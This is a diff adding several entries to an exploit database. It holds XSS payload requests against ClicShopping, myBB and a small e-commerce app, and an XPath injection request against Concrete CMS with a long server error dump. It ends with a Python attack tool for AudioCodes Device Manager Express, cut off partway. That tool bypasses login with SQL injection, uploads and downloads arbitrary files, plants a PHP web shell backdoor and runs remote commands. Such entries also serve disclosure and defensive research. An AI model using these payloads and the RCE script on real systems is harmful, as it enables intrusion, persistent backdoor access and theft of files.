@@ -0,0 +1,56 @@
+## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
+## Author: nu11secur1ty
+## Date: 11.20.2022
+## Vendor: https://www.clicshopping.org/forum/
+## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
+
+## Description:
+The name of an arbitrarily supplied URL parameter is copied into the
+value of an HTML tag attribute which is encapsulated in double
+quotation marks.
+The attacker can trick users to open a very dangerous link or he can
+get sensitive information, also he can destroy some components of your
+system.
+
+## STATUS: HIGH Vulnerability
+
+[+] Payload:
+
+```js
+GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
+HTTP/1.1
+Host: pwnedhost.com
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
+
+## Proof and Exploit:
+[href]()https://streamable.com/rzpgsu
+
+## Time spent
+`1:00`
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51136.txt b/exploits/php/webapps/51136.txt
new file mode 100644
index 000000000..91a652f11
--- /dev/null
+++ b/exploits/php/webapps/51136.txt
@@ -0,0 +1,173 @@
+# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: Andrey Stoykov
+# Software Link: https://mybb.com/versions/1.8.26/
+# Version: 1.8.26
+# Tested on: Ubuntu 20.04
+
+Stored XSS #1:
+
+
+To reproduce do the following:
+
+1. Login as administrator user
+2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =
+"Global Templates"=20
+3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=
+rt(1)>
+
+
+// HTTP POST request showing XSS payload
+
+POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=
+late HTTP/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=
+or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing
+
+
+// HTTP redirect response to specific template
+
+HTTP/1.1 302 Found
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=
+=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1
+[...]
+
+
+// HTTP GET request to newly created template
+
+GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+
+// HTTP response showing unsanitized XSS payload
+
+HTTP/1.1 200 OK
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+X-Powered-By: PHP/5.6.40
+[...]
+
+<tr class=3D"first">
+<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=
+n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=
+E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>
+[...]
+
+
+Stored XSS #2:
+
+To reproduce do the following:
+
+1. Login as administrator user
+2. Browse to "Forums and Posts" -> "Forum Management"
+3. Select "Add New Forum" and enter payload "><script>alert(1)</script>
+
+
+// HTTP POST request showing XSS payload
+
+POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=
+/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=
+lert(1)</script>&description=3D"><script>alert(2)</script[...]
+
+
+// HTTP response showing successfully added a new forum
+
+HTTP/1.1 200 OK
+Date: Sun, 20 Nov 2022 11:00:28 GMT
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+[...]
+
+
+// HTTP GET request to fetch forums
+
+GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+
+// HTTP response showing unsanitized XSS payload
+
+HTTP/1.1 200 OK
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+[...]
+
+<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=
+=3D3">"><script>alert(1)</script></a></small>
+
+
+Stored XSS #3:
+
+
+To reproduce do the following:
+
+1. Login as administrator user
+2. Browse to "Forums and Posts" -> "Forum Announcements"
+3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=
+rt(1)>
+
+
+// HTTP POST request showing XSS payload
+
+POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=
+TTP/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=
+or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=
+2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=
+r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=
+(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1
+
+
+// HTTP response showing successfully added an anouncement
+
+HTTP/1.1 302 Found
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+[...]
+
+
+// HTTP GET request to fetch forum URL
+
+GET /mybb_1826/ HTTP/1.1
+Host: 192.168.139.132
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
+101 Firefox/106.0
+[...]
+
+
+// HTTP response showing unsanitized XSS payload
+
+HTTP/1.1 200 OK
+Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
+erl/v5.16.3
+[...]
+
+<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=
+</a>
+
+
+
+--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--
\ No newline at end of file
diff --git a/exploits/php/webapps/51140.txt b/exploits/php/webapps/51140.txt
new file mode 100644
index 000000000..085d43f34
--- /dev/null
+++ b/exploits/php/webapps/51140.txt
@@ -0,0 +1,57 @@
+## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS)
+## Author: nu11secur1ty
+## Date: 11.23.2022
+## Vendor: https://github.com/winston-dsouza
+## Software: https://github.com/winston-dsouza/ecommerce-website
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
+
+## Description:
+The value of the eMail request parameter is copied into the value of
+an HTML tag attribute which is encapsulated in double quotation marks.
+The attacker can trick the users of this system, very easy to visit a
+very dangerous link from anywhere, and then the game will over for
+these customers.
+Also, the attacker can create a network from botnet computers by using
+this vulnerability.
+
+## STATUS: HIGH Vulnerability - CRITICAL
+
+[+] Exploit:
+
+```POST
+POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
+HTTP/1.1
+Host: pwnedhost.com
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
+Origin: http://pwnedhost.com
+Upgrade-Insecure-Requests: 1
+Referer: http://pwnedhost.com/ecommerce/index.php
+Content-Type: application/x-www-form-urlencoded
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 0
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
+
+## Proof and Exploit:
+[href](https://streamable.com/3r4t36)
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51144.txt b/exploits/php/webapps/51144.txt
new file mode 100644
index 000000000..08f735126
--- /dev/null
+++ b/exploits/php/webapps/51144.txt
@@ -0,0 +1,265 @@
+## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
+## Author: nu11secur1ty
+## Date: 11.28.2022
+## Vendor: https://www.concretecms.org/
+## Software: https://www.concretecms.org/download
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
+
+## Description:
+The URL path folder `3` appears to be vulnerable to XPath injection attacks.
+The test payload 50539478' or 4591=4591-- was submitted in the URL
+path folder `3`, and an XPath error message was returned.
+The attacker can flood with requests the system by using this
+vulnerability to untilted he receives the actual paths of the all
+content of this system which content is stored on some internal or
+external server.
+
+## STATUS: HIGH Vulnerability
+
+[+] Exploits:
+00:
+```GET
+GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
+HTTP/1.1
+Host: pwnedhost.com
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 0
+```
+
+[+] Response:
+
+```HTTP
+HTTP/1.1 500 Internal Server Error
+Date: Mon, 28 Nov 2022 15:32:22 GMT
+Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
+X-Powered-By: PHP/7.4.30
+Connection: close
+Content-Type: text/html;charset=UTF-8
+Content-Length: 592153
+
+<!DOCTYPE html><!--
+
+
+Whoops\Exception\ErrorException: include(): Failed opening
+&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
+for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
+in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
+on line 26
+Stack trace:
+  1. Whoops\Exception\ErrorException->()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
+  2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
+  3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
+  4. Stash\Driver\FileSystem->getData()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
+  5. Stash\Item->getRecord()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
+  6. Stash\Item->executeGet()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
+  7. Stash\Item->get()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
+  8. Stash\Item->isMiss()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
+  9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
+ 10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
+ 11. Laminas\I18n\Translator\Translator->loadMessages()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
+ 12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
+ 13. Laminas\I18n\Translator\Translator->translate()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
+ 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
+ 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
+ 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
+ 17. Concrete\Core\Block\View\BlockView->renderViewContents()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
+ 18. Concrete\Core\View\AbstractView->render()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
+ 19. Concrete\Core\Area\Area->display()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
+ 20. Concrete\Core\Area\GlobalArea->display()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
+ 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
+ 22. Concrete\Core\View\View->inc()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
+ 23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
+ 24. Concrete\Core\View\View->renderTemplate()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
+ 25. Concrete\Core\View\View->renderViewContents()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
+ 26. Concrete\Core\View\AbstractView->render()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
+ 27. Concrete\Controller\SinglePage\PageNotFound->view()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
+ 28. call_user_func_array()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
+ 29. Concrete\Core\Controller\AbstractController->runAction()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
+ 30. Concrete\Core\Http\ResponseFactory->controller()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
+ 31. Concrete\Core\Http\ResponseFactory->notFound()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
+ 32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
+ 33. Concrete\Core\Http\ResponseFactory->collection()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
+ 34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
+ 35. Concrete\Core\Http\DefaultDispatcher->dispatch()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
+ 36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
+ 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
+ 38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
+ 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
+ 40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
+ 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
+ 42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
+ 43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
+ 44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
+ 45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
+ 46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
+ 47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
+ 48. Concrete\Core\Http\DefaultServer->handleRequest()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
+ 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
+ 50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
+C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
+ 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
+
+
+--><html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="robots" content="noindex,nofollow"/>
+    <meta name="viewport" content="width=device-width,
+initial-scale=1, shrink-to-fit=no"/>
+    <title>Concrete CMS has encountered an issue.</title>
+
+    <style>body {
+  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
+  color: #131313;
+  background: #eeeeee;
+  padding:0;
+  margin: 0;
+  max-height: 100%;
+
+  text-rendering: optimizeLegibility;
+}
+  a {
+    text-decoration: none;
+  }
+
+.Whoops.container {
+    position: relative;
+    z-index: 9999999999;
+}
+
+.panel {
+    overflow-y: scroll;
+    height: 100%;
+    position: fixed;
+    margin: 0;
+    left: 0;
+    top: 0;
+}
+
+.branding {
+  position: absolute;
+  top: 10px;
+  right: 20px;
+  color: #777777;
+  font-size: 10px;
+    z-index: 100;
+}
+  .branding a {
+    color: #e95353;
+  }
+
+header {
+  color: white;
+  box-sizing: border-box;
+  background-color: #2a2a2a;
+  padding: 35px 40px;
+  max-height: 180px;
+  overflow: hidden;
+  transition: 0.5s;
+}
+
+  header.header-expand {
+    max-height: 1000px;
+  }
+
+  .exc-title {
+    margin: 0;
+    color: #bebebe;
+    font-size: 14px;
+  }
+    .exc-title-primary, .exc-title-secondary {
+      color: #e95353;
+    }
+
+    .exc-message {
+      font-size: 20px;
+      word-wrap: break-word;
+      margin: 4px 0 0 0;
+      color: white;
+    }
+      .exc-message span {
+        display: block;
+      }
+      .exc-message-empty-notice {
+        color: #a29d9d;
+        font-weight: 300;
+      }
+
+.......
+
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)
+
+## Proof and Exploit:
+[href](https://streamable.com/4f60ka)
+
+## Time spent
+`03:00:00`
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51145.py b/exploits/php/webapps/51145.py
new file mode 100755
index 000000000..5ab6fd9ce
--- /dev/null
+++ b/exploits/php/webapps/51145.py
@@ -0,0 +1,191 @@
+# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
+# Date: 02-12-22
+# Exploit Author: 0xEF
+# Vendor Homepage: https://www.audiocodes.com
+# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
+# Version: <= 7.8.20002.47752
+# Tested on: Windows 10 & Windows Server 2019
+# Default credentials: admin/admin
+# SQL injection + Path traversal + Remote Command Execution
+# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import time
+import re
+import colorama
+from colorama import Fore, Style
+import uuid
+
+headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+
+def menu():
+   print('-----------------------------------------------------------------------\n'
+         'AudioCodes Device Manager Express                 45 78 70 6C 6F 69 74 \n'
+         '-----------------------------------------------------------------------')
+
+def optionlist(s,target):
+  try:
+   print('\nOptions: (Press any other key to quit)\n'
+         '-----------------------------------------------------------------------\n'
+         '1: Upload arbitrary file\n'
+         '2: Download arbitrary file\n'
+         '3: Execute command\n'
+         '4: Add backdoor\n'
+         '-----------------------------------------------------------------------')
+   option = int(input('Select: '))
+   if(option == 1):
+     t = 'a'
+     upload_file(s,target,t)
+   elif(option == 2):
+     download_file(s,target)
+   elif(option == 3):
+     execute(s,target)
+   elif(option == 4):
+     t = 'b'
+     upload_file(s,target,t)
+  except:
+     sys.exit()
+
+
+def bypass_auth(target):
+   try:
+      print(f'\nTrying to bypass authentication..\n')
+      url = f'http://{target}/admin/AudioCodes_files/process_login.php'
+      s = requests.Session()
+      # CVE-2022-24627
+      payload_list = ['\'or 1=1#','\\\'or 1=1#','admin']
+      for payload in payload_list:
+         body = {'username':'admin','password':'','domain':'','p':payload}
+         r = s.post(url, data = body)
+      if('Configuration' in r.text):
+         print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
+         time.sleep(1)
+         return(s)
+      else:
+         print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
+         main()
+   except:
+      sys.exit()
+
+def upload_file(s,target,t):
+   try:
+     url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
+     param = uuid.uuid4().hex
+     file = input('\nEnter file name: ')
+     # read extension
+     ext = file.rsplit( ".", 1 )[ 1 ]
+     if (t=='b'):
+        # remove extension
+        file = file.rsplit( ".", 1 )[ 0 ] + '.php'
+        ext = 'php'
+     patch = '1'
+     if(file != ''):
+       if(patch_ext(s,target,patch,ext)):
+          # CVE-2022-24629
+          print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
+          if(t=='a'):
+            dest = input('\nEnter destination location (ex. c:\): ')
+            print(f'\nUploading file to {target}: {dest}{file}')
+            files = {'myfile': (file, open(file,'rb'), 'text/html')}
+            body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
+            r = s.post(url, files=files, data=body)
+            print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
+          if(t=='b'):
+            shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
+            files = {f'myfile': (file, shell, 'text/html')}
+            body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
+            r = s.post(url, files=files, data=body)
+            print(f'\nBackdoor location:')
+            print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
+          patch = '2'
+          time.sleep(1)
+          patch_ext(s,target,patch,ext)
+       else:
+          print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
+   except:
+       print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
+       patch = '2'
+       patch_ext(s,target,patch,ext)
+
+def download_file(s,target):
+   # CVE-2022-24632
+   try:
+     file = input('\nFull path to file, eg. c:\\windows\win.ini: ')
+     if(file != ''):
+         url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
+         r = s.get(url)
+         if (len(r.content) > 0):
+           print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
+           file = str(file).split('\\')[-1:][0]
+           open(file, 'wb').write(r.content)
+         else:
+           print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
+     else:
+       print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
+   except:
+      sys.exit()
+
+def execute(s,target):
+   try:
+     while True:
+      # CVE-2022-24631
+      command = input('\nEnter a command: ')
+      if(command == ''):
+        optionlist(s,target)
+        break
+      print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
+      body = 'ssh_command='+ command
+      url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
+      r = s.post(url, data = body, headers=headers)
